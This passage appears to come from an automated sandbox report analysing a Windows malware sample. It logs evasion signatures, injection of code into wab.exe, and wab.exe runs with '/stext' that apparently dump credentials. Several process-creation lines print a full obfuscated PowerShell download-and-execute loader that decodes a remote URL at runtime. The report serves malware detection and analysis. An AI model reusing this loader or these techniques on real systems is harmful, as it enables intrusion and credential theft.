                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 70BDF8D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,20_2_0040DD85
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6162Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3647Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7554Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1989Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 431Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 9064Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 1768Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.6 %
                Source: C:\Windows\System32\wscript.exe TID: 6624Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6532Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7416Thread sleep count: 7554 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7420Thread sleep count: 1989 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7448Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7888Thread sleep count: 229 > 30Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7888Thread sleep time: -114500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7892Thread sleep count: 431 > 30Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7892Thread sleep time: -1293000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7892Thread sleep count: 9064 > 30Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7892Thread sleep time: -27192000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_245710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,17_2_245710F1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24576580 FindFirstFileExA,17_2_24576580
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0040AE51 FindFirstFileW,FindNextFileW,20_2_0040AE51
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,23_2_00407EF8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 24_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,24_2_00407898
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00418981 memset,GetSystemInfo,20_2_00418981
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: wscript.exe, 00000000.00000002.1251636537.0000029D2C54C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0E
                Source: wscript.exe, 00000000.00000003.1240505483.0000029D2C4A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250511137.0000029D2C446000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1241291623.0000029D2C458000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1241168691.0000029D2C431000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1251482657.0000029D2C446000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1251127481.0000029D2A500000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1251535696.0000029D2C496000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1241392491.0000029D2C4A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250015432.0000029D2C496000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000002.00000002.2004357500.0000019EF5F26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWre%SystemRoot%\system32\mswsock.dllEndrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.rurenaVekslerlOttom nePassersoMent lha BallisnViv
                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_23-34118
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24573856 GetLastError,___vcrt_FlsGetValue,___vcrt_FlsSetValue,LdrInitializeThunk,___vcrt_FlsSetValue,___vcrt_FlsSetValue,SetLastError,17_2_24573856
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_245760E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_245760E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,20_2_0040DD85
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,20_2_004044A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24574AB4 mov eax, dword ptr fs:[00000030h]17_2_24574AB4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_2457724E GetProcessHeap,17_2_2457724E
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_245760E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_245760E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24572639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_24572639
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24572B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_24572B1C

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: amsi64_720.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 720, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7368, type: MEMORYSTR
                Maps a DLL or memory area into another process
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 44E0000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 327F894Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\knsxyccvpjetrdvkvhhergkhudayiyl"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xkkian"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'knyttelversenes brilliancies informatica200 bloodroot skrbeligt157 vulcanisable doseringsapparatet superhuman forbytter branddr simplifier commercializing skuffelserne tillukkede121 transseksualismens stamcafym darkey opdagelsesrejses pretenders preemphasize87 scrawliness standardisations smedemestres antibridal knyttelversenes brilliancies informatica200 bloodroot skrbeligt157 vulcanisable doseringsapparatet superhuman forbytter branddr simplifier commercializing skuffelserne tillukkede121 transseksualismens stamcafym darkey opdagelsesrejses pretenders preemphasize87 scrawliness standardisations smedemestres antibridal';if (${host}.currentculture) {$transplantat++;}function brassart($slingrer){$unbarking=$slingrer.length-$transplantat;$sendetiders='substri';$sendetiders+='ng';for( $catacrotism=7;$catacrotism -lt $unbarking;$catacrotism+=8){$knyttelversenes+=$slingrer.$sendetiders.invoke( $catacrotism, $transplantat);}$knyttelversenes;}function sarcophilus($cerecloth){ & ($grossisten) ($cerecloth);}$deletive=brassart ' unfitlmfer iswomedr.vezleon.teiphotolyl vikin lhemat,rareevoki/saturan5abac.na.japaner0domitiu ,eddykn(servo.ywslvtlysialoewoonho edkld stippeo igmandwrettoryskafk,sk opi,ionnbyrderstcrimina spec.al1awingly0 .ctapo.lilj.rk0ebbinge;camesth afskrmnw gona.eisp.ceryn sundhe6graaspu4vesbite;objekti dobbeltxkammede6aquidne4verserb;pseudom sprogblrscru invandr as:s,eepin1kimblad2leveful1ut ovrd.tintall0 lervar)vinha,d forurengwaggleredravyavc haggadkbantamsodec,nce/fototek2vedlige0 e stra1udram t0scotiat0 doorma1 fluori0mur ero1idrt.kl si detnfdevadr,icetacearhvorefte sond lf .ookbio augmenx elvang/ringvej1thewnes2shikses1porogam.grassch0cleansg ';$capkin=brassart ' ret.imushreddessti hvee.rydelardemoral-unwre.kadramming mik iseirishgrnpopsi,stunaisle ';$skrbeligt157=brassart 'sim,linh paabu.tsugarintboghvedpgeneral: syn,rg/pre.til/lepidob1kl,vare0forudan3uniso,a. ungrea2komp.ns3hum.uri7 sociol.logogra8tetremi6data,le..rammab2antilip4 pissoi7superin/takte.it forsakeopga gsevibratenmaniernt inhesis owshaigradieneunionisr.odalis.bueformla,teriopinspirak mortif ';$conscionableness=brassart 'stateli>stalact ';$grossisten=brassart ' inergiforkodeesemiurnxinosini ';$easters='superhuman';$paleoandesite = brassart ' brudekeblin,tec efterbhpolytypoamar,ll champla%anl sbeasegnefrptidalp.phemocryduncravia spr.gft baromea bick,r% u rmme\waver,namidwif p hnetropspatiumepostnumls andsfmmothbalu dukkeal seed eifamilieg modtaghpithecoe int.rldinkorpo.i.formabtjenestemedi inssortime theopha&sbefabr&a sgnin tyvendeeta terecafflatuh v,rtumounciale droplettsubvers ';sarcophilus (brassart ' underm$spinulagkredit lkldebrsoreekingbpaeanisahjtelskl endrud: enegaiaddictinov.rvine uickexkrakelee vedf,er orchidtsvinek i tvilliokos,forndecentr=nonincl( skyllec themsemslu,gyhdtwin,le mennesk/henvejrcr,exper pelycos$mikaagrpf.
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'knyttelversenes brilliancies informatica200 bloodroot skrbeligt157 vulcanisable doseringsapparatet superhuman forbytter branddr simplifier commercializing skuffelserne tillukkede121 transseksualismens stamcafym darkey opdagelsesrejses pretenders preemphasize87 scrawliness standardisations smedemestres antibridal knyttelversenes brilliancies informatica200 bloodroot skrbeligt157 vulcanisable doseringsapparatet superhuman forbytter branddr simplifier commercializing skuffelserne tillukkede121 transseksualismens stamcafym darkey opdagelsesrejses pretenders preemphasize87 scrawliness standardisations smedemestres antibridal';if (${host}.currentculture) {$transplantat++;}function brassart($slingrer){$unbarking=$slingrer.length-$transplantat;$sendetiders='substri';$sendetiders+='ng';for( $catacrotism=7;$catacrotism -lt $unbarking;$catacrotism+=8){$knyttelversenes+=$slingrer.$sendetiders.invoke( $catacrotism, $transplantat);}$knyttelversenes;}function sarcophilus($cerecloth){ & ($grossisten) ($cerecloth);}$deletive=brassart ' unfitlmfer iswomedr.vezleon.teiphotolyl vikin lhemat,rareevoki/saturan5abac.na.japaner0domitiu ,eddykn(servo.ywslvtlysialoewoonho edkld stippeo igmandwrettoryskafk,sk opi,ionnbyrderstcrimina spec.al1awingly0 .ctapo.lilj.rk0ebbinge;camesth afskrmnw gona.eisp.ceryn sundhe6graaspu4vesbite;objekti dobbeltxkammede6aquidne4verserb;pseudom sprogblrscru invandr as:s,eepin1kimblad2leveful1ut ovrd.tintall0 lervar)vinha,d forurengwaggleredravyavc haggadkbantamsodec,nce/fototek2vedlige0 e stra1udram t0scotiat0 doorma1 fluori0mur ero1idrt.kl si detnfdevadr,icetacearhvorefte sond lf .ookbio augmenx elvang/ringvej1thewnes2shikses1porogam.grassch0cleansg ';$capkin=brassart ' ret.imushreddessti hvee.rydelardemoral-unwre.kadramming mik iseirishgrnpopsi,stunaisle ';$skrbeligt157=brassart 'sim,linh paabu.tsugarintboghvedpgeneral: syn,rg/pre.til/lepidob1kl,vare0forudan3uniso,a. ungrea2komp.ns3hum.uri7 sociol.logogra8tetremi6data,le..rammab2antilip4 pissoi7superin/takte.it forsakeopga gsevibratenmaniernt inhesis owshaigradieneunionisr.odalis.bueformla,teriopinspirak mortif ';$conscionableness=brassart 'stateli>stalact ';$grossisten=brassart ' inergiforkodeesemiurnxinosini ';$easters='superhuman';$paleoandesite = brassart ' brudekeblin,tec efterbhpolytypoamar,ll champla%anl sbeasegnefrptidalp.phemocryduncravia spr.gft baromea bick,r% u rmme\waver,namidwif p hnetropspatiumepostnumls andsfmmothbalu dukkeal seed eifamilieg modtaghpithecoe int.rldinkorpo.i.formabtjenestemedi inssortime theopha&sbefabr&a sgnin tyvendeeta terecafflatuh v,rtumounciale droplettsubvers ';sarcophilus (brassart ' underm$spinulagkredit lkldebrsoreekingbpaeanisahjtelskl endrud: enegaiaddictinov.rvine uickexkrakelee vedf,er orchidtsvinek i tvilliokos,forndecentr=nonincl( skyllec themsemslu,gyhdtwin,le mennesk/henvejrcr,exper pelycos$mikaagrpf.
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'knyttelversenes brilliancies informatica200 bloodroot skrbeligt157 vulcanisable doseringsapparatet superhuman forbytter branddr simplifier commercializing skuffelserne tillukkede121 transseksualismens stamcafym darkey opdagelsesrejses pretenders preemphasize87 scrawliness standardisations smedemestres antibridal knyttelversenes brilliancies informatica200 bloodroot skrbeligt157 vulcanisable doseringsapparatet superhuman forbytter branddr simplifier commercializing skuffelserne tillukkede121 transseksualismens stamcafym darkey opdagelsesrejses pretenders preemphasize87 scrawliness standardisations smedemestres antibridal';if (${host}.currentculture) {$transplantat++;}function brassart($slingrer){$unbarking=$slingrer.length-$transplantat;$sendetiders='substri';$sendetiders+='ng';for( $catacrotism=7;$catacrotism -lt $unbarking;$catacrotism+=8){$knyttelversenes+=$slingrer.$sendetiders.invoke( $catacrotism, $transplantat);}$knyttelversenes;}function sarcophilus($cerecloth){ & ($grossisten) ($cerecloth);}$deletive=brassart ' unfitlmfer iswomedr.vezleon.teiphotolyl vikin lhemat,rareevoki/saturan5abac.na.japaner0domitiu ,eddykn(servo.ywslvtlysialoewoonho edkld stippeo igmandwrettoryskafk,sk opi,ionnbyrderstcrimina spec.al1awingly0 .ctapo.lilj.rk0ebbinge;camesth afskrmnw gona.eisp.ceryn sundhe6graaspu4vesbite;objekti dobbeltxkammede6aquidne4verserb;pseudom sprogblrscru invandr as:s,eepin1kimblad2leveful1ut ovrd.tintall0 lervar)vinha,d forurengwaggleredravyavc haggadkbantamsodec,nce/fototek2vedlige0 e stra1udram t0scotiat0 doorma1 fluori0mur ero1idrt.kl si detnfdevadr,icetacearhvorefte sond lf .ookbio augmenx elvang/ringvej1thewnes2shikses1porogam.grassch0cleansg ';$capkin=brassart ' ret.imushreddessti hvee.rydelardemoral-unwre.kadramming mik iseirishgrnpopsi,stunaisle ';$skrbeligt157=brassart 'sim,linh paabu.tsugarintboghvedpgeneral: syn,rg/pre.til/lepidob1kl,vare0forudan3uniso,a. ungrea2komp.ns3hum.uri7 sociol.logogra8tetremi6data,le..rammab2antilip4 pissoi7superin/takte.it forsakeopga gsevibratenmaniernt inhesis owshaigradieneunionisr.odalis.bueformla,teriopinspirak mortif ';$conscionableness=brassart 'stateli>stalact ';$grossisten=brassart ' inergiforkodeesemiurnxinosini ';$easters='superhuman';$paleoandesite = brassart ' brudekeblin,tec efterbhpolytypoamar,ll champla%anl sbeasegnefrptidalp.phemocryduncravia spr.gft baromea bick,r% u rmme\waver,namidwif p hnetropspatiumepostnumls andsfmmothbalu dukkeal seed eifamilieg modtaghpithecoe int.rldinkorpo.i.formabtjenestemedi 